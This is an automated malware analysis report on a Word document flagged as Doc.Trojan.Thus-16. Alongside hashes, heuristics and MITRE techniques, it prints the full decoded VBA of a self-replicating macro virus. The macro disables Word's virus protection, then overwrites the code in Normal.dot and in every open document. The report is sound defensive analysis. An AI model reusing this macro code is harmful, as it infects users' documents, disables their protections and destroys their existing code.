Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cdbf8397706b448b…

MALICIOUS

Office (OLE)

Size: 35.5 KB | Created: 2009-04-17 15:44:00 | Authoring application: Microsoft Word 11.5.3 | First seen: 2020-09-15
MD5: 86be2e1092fc8553d045a1c98ccd2a87
SHA-1: 2dd1b99c3d0d8bdea6201350cbb74d65ae3335e9
SHA-256: cdbf8397706b448b1d261c71e885aa793ac033a691ba14f4d9cfd351f69b617a
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample triggers the high-severity heuristic OLE_VBA_DOCOPEN, indicating the presence of a Document_Open macro that runs automatically when the document is opened (a Document_New handler calls the same routine when a new document is created from it). The extracted VBA first sets Application.Options.VirusProtection to False, then copies its own code module into the NormalTemplate (Normal.dot) and into every currently open document whose module does not already carry the 'Mat1' marker, overwriting whatever code was there. This self-replication through the global template is the classic macro-virus persistence mechanism; the macro also declares the ExitWindowsEx API but does not call it in the extracted code, and no download or secondary-payload logic is visible in the recovered source. The ClamAV detection 'Doc.Trojan.Thus-16' is consistent with this behaviour.

Heuristics (3)

  • ClamAV: Doc.Trojan.Thus-16 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-16
  • VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document_Open macro present; it executes automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 1958 bytes
SHA-256: cddc63f2636e26dfbfde9560c0071857ad6cd5abc8e10de5320ebe546e8d3f5d
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
   On Error Resume Next
   Application.Options.VirusProtection = False
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   End If
   
   If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
   1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
   (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
   End If
   
   If NormalTemplate.Saved = False Then NormalTemplate.Save
   
   For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
        1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
        1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
        (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
   Next k
End Sub

Private Sub Document_New()
    Document_Open
End Sub